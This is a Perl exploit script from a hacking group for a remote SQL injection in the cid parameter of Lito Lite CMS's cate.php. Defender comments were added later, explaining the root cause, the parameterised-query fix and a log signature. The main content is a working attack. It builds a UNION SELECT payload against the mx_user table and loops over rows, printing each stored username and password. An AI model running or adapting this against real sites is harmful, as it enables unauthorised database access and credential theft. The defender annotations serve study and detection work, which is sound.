Lito Lite CMS cate.php cid Remote SQL Injection Exploit

  1    #!/usr/bin/perl −w
  2    #===========================================================
  3    # Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit
  4    #===========================================================
  5    #
  6    # ,−−^−−−−−−−−−−,−−−−−−−−,−−−−−,−−−−−−−^−−,
  7    # | |||||||||     ‘−−−−−−−−’     |          O    .. CWH Underground Hacking Team ..
  8    # ‘+−−−−−−−−−−−−−−−−−−−−−−−−−−−^−−−−−−−−−−|
  9    #    ‘\_,−−−−−−−, _________________________|
  10   #       / XXXXXX /‘|      /
  11   #     / XXXXXX / ‘\     /
  12   #    / XXXXXX /\______(
  13   #   / XXXXXX /
  14   # / XXXXXX /
  15   # (________(
  16   # ‘−−−−−−’
  17   #
  18   #AUTHOR : CWH Underground
  19   #DATE : 29 November 2008
  20   #SITE : cwh.citec.us
  21   #
  22   #
  23   #####################################################
  24   #APPLICATION : Lito Lite CMS
  25   #DOWNLOAD     : http://www.lovedesigner.net/files/download/lito_lite.zip
  26   ######################################################
  27   #
  28   #Note: magic_quotes_gpc = off
  29   #
  30   #######################################################################################
  31   #Greetz       : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
  32   #Special Thx : asylu3, str0ke, citec.us, milw0rm.com
  33   #######################################################################################
  34
  35
  36   use LWP::UserAgent;
  37   use HTTP::Request;
  38
       # Usage guard: the script expects exactly two command-line arguments.
       # With any other count it prints the banner and usage text below and
       # exits without sending any request.
  39   if ($#ARGV+1 != 2)
  40   {
  41      print "\n==============================================\n";
  42      print " Lito Lite Remote SQL Injection Exploit \n";
  43      print "                           \n";
  44      print "        Discovered By CWH Underground     \n";
  45      print "==============================================\n";
  46      print "                           \n";
  47      print " ,−−^−−−−−−−−−−,−−−−−−−−,−−−−−,−−−−−−−^−−, \n";
  48      print " | ||||||||| ‘−−−−−−−−’ |     O                   \n";
  49      print " ‘+−−−−−−−−−−−−−−−−−−−−−−−−−−−^−−−−−−−−−−| \n";
  50      print " ‘\_,−−−−−−−, _________________________| \n";
  51      print "      / XXXXXX /‘| /              \n";
  52      print " / XXXXXX / ‘\ /                  \n";
  53       print " / XXXXXX /\______(                    \n";
  54       print " / XXXXXX /                         \n";
  55       print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
  56       print " (________(                      \n";
  57       print " ‘−−−−−−’                        \n";
  58       print "                            \n";
           # <Target> is the base URL under which cate.php is requested;
           # <Data Limit> is the upper bound on the number of rows the script
           # asks for, one HTTP request per row.
  59       print "Usage : ./xpl.pl <Target> <Data Limit>\n";
  60       print "Example: ./xpl.pl http://www.target.com/lito_lite 10\n";
  61       exit();
  62   }
  63
       # Proof-of-concept for a UNION-based SQL injection in the `cid` query
       # parameter of cate.php.
       #
       # Defender notes:
       #  - Root cause is server-side: the request only works if `cid` reaches
       #    a SQL statement inside a quoted string without escaping. The PHP
       #    source is not shown here -- presumably the query is built by string
       #    concatenation; confirm in cate.php. The durable fix is a
       #    parameterised query (or an integer cast of `cid`), not request
       #    filtering.
       #  - The header's "magic_quotes_gpc = off" note marks the precondition:
       #    with that PHP setting on, the quote would have been auto-escaped.
       #    The setting was removed in PHP 5.4, so it must not be counted on as
       #    a control.
       #  - Log signature: repeated GETs to cate.php whose `cid` value contains
       #    an encoded quote (%27) followed by `union` / `select`, differing
       #    only in the trailing offset number. No User-Agent is set below, so
       #    requests carry LWP's default "libwww-perl/<version>" string.
       #
       # Accept the target with or without a leading "http://".
  64   $target = ($ARGV[0] =~ /^http:\/\//) ?                $ARGV[0]:       ’http://’ . $ARGV[0];
       # Second argument: maximum number of rows to request (loop bound below).
  65   $number = $ARGV[1];
  66
  67   print   "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
  68   print   "\n ..:: SQL Injection Exploit By CWH Underground ::.. ";
  69   print   "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
  70   print   "\n[+]Dump Username and Password\n";
  71
       # One HTTP GET per row; the loop counter becomes the OFFSET value in the
       # injected query, so each iteration asks for the next row of mx_user.
  72   for ($start=0;$start<$number;$start++) {
  73
       # A fresh user agent object is created on every iteration.
  74   $xpl = LWP::UserAgent−>new() or die "Could not initialize browser\n";
       # The `cid` value closes the application's string literal with %27,
       # makes the original SELECT return no rows (1=2), and appends a
       # ten-column UNION SELECT that reads username and password from
       # mx_user. The 0x3a bytes are ':' characters, producing the
       # ":::user::pass:::" marker that is searched for in the response below.
       # The column count and the position of the echoed column are presumably
       # tied to the application's original query -- not verifiable from here.
       # NOTE(review): HTTP::Request->new only builds the request object, so
       # the `or die` on this statement does not detect a connection failure.
  75   $req = HTTP::Request−>new(GET => $target."/cate.php?cid=1%27%20and%201=2%20union%20select 1,2,3,concat(0x3a3a3a,username,0x3a3a,password,0x
       3a3a3a),5,6,7,8,9,10%20from%20mx_user%20limit%201%20offset%20".$start."−−+and+1=1")or die "Failed to Connect, Try again!\n";
  76   $res = $xpl−>request($req);
       # The response status is never checked; only the body is inspected.
  77   $info = $res−>content;
       # 1-based row number used only for display.
  78   $count=$start+1;
  79
       # Look for the ":::" delimited marker in the returned page. `.` does not
       # match a newline here, so the capture stays within a single line.
  80   if ($info =~ /:::(.+):::/)
  81   {
  82   $dump=$1;
       # Split the captured text on "::" into the two stored column values.
       # Whatever mx_user.password holds (plaintext or a hash -- not shown
       # here) is printed as-is. If this request pattern succeeded against a
       # site, every credential in mx_user should be treated as exposed and
       # rotated.
  83   ($username,$password)= split(’::’,$dump);
  84   printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
  85   }
       # Reached whenever the marker is absent: end of rows, a patched target,
       # and an HTTP or network error all land here and print the same "Done"
       # message. The trailing `or die` only fires if print itself fails, so
       # this output is not evidence either way about the target's state.
  86   else {
  87           print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
  88           exit;
  89   }
  90   }
  91
  92   # milw0rm.com [2008−11−29]



